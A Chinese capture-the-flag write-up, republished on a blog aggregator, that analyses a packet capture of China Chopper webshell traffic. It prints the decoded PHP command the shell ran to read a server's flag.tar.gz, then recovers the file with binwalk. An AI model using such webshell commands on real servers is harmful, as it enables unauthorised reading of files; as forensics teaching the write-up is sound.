码迷,mamicode.com
首页 > 其他好文 > 详细

Bugku 分析 中国菜刀

时间:2019-02-04 12:50:34      阅读:309      评论:0      收藏:0      [点我收藏+]

标签:3.0   assert   bug   error:   fopen   file   中国   wro   response   

解压之后得到了一个流量包,只有不到10KB,美滋滋

先抓重点,过滤出http,只有6条数据记录,3条post,3条response,3条post都是一样的

随便打开一条pos

是一个assert断言,断言内容是一串base64加密的字符串(最后的%3D先解码为=)

得到了一串php代码

@ini_set("display_errors","0");
@set_time_limit(0);
if(PHP_VERSION<\‘5.3.0\‘)
{
    @set_magic_quotes_runtime(0);
};
echo("X@Y");
$F="C:\\\\wwwroot\\\\flag.tar.gz";
$fp=@fopen($F,\‘r\‘);
if(@fgetc($fp))
{
    @fclose($fp);
    @readfile($F);
}
else
{
    echo(\‘ERROR:// Can Not Read\‘);
};
echo("X@Y");
die();

就是说打印一个叫flag(等等flag?)的文件,并在前后打印X@Y

快乐,只要找到flag.tar.gz就好了

最后一条response中就有这个文件

既然是一个文件中包含另一个文件,那就试一试binwalk

提取并解压,即可得到flag

 

Bugku 分析 中国菜刀

标签:3.0   assert   bug   error:   fopen   file   中国   wro   response   

原文地址:https://www.cnblogs.com/fantasquex/p/10351617.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!